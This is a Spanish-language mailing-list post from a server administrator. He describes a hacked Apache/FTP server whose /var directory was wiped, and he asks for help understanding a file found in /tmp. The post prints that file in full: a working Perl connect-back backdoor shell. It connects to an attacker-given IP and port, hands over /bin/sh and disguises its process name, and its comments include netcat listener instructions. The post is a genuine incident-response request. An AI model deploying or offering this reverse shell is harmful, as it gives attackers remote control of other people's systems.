Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del
crimen contra un servidor que fue hackeado :-(
en primera instancia puedo creer que el ataque fue hecho via web ya que
la maquina en si.. no tiene contacto fisico alguno con el exterior a
escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en
chroot).
el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web
bases de datos ssh y el equipo se colgo..
fue una gran sorpresa al darme cuenta que cuando inicie la makina en
modo rescate /var estaba vacio practicamente piendo en un rm
-rf /var :-(... por ende.. no tengo logs para buscar algun tipo de
atake.. pero buscando en /tmp encontre algo interezante un archivo
llamado _conex.pl_
cuyo contenido muestro aqui.
----------C O D E-------------
#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox,
for example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl
connect.pl <iptoolbox> <ncportlisten>
# --------
# The supplied exploit code is not to be used for malicious purpose, but
for educational purpose only. The Authors and 1ndonesian Security Team
WILL NOT responsible for anything happened by the couse of using all
information on these website.
# ---------
use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security
Team (1st)\n\n";
$cmd= "lpd";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print STDOUT $pamer;
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
----------F I N C O D E-------------
y me dije que diablos !!!...
entonces.. me decidi a preguntar a la lista por si alguien mas o menos
entiende este script o podria decir como funciona.. para tomar
precauciones en la proxima reinstalacion del servidor. y asi protejer
mejor los servicios. y claro esta.. asi todos aprendemos un poquito
mas de seguridad que es tan importante.
Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un
informe claro y Tecnico de lo sucedido aqui.
Atentamente
Nelson Lopez.
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
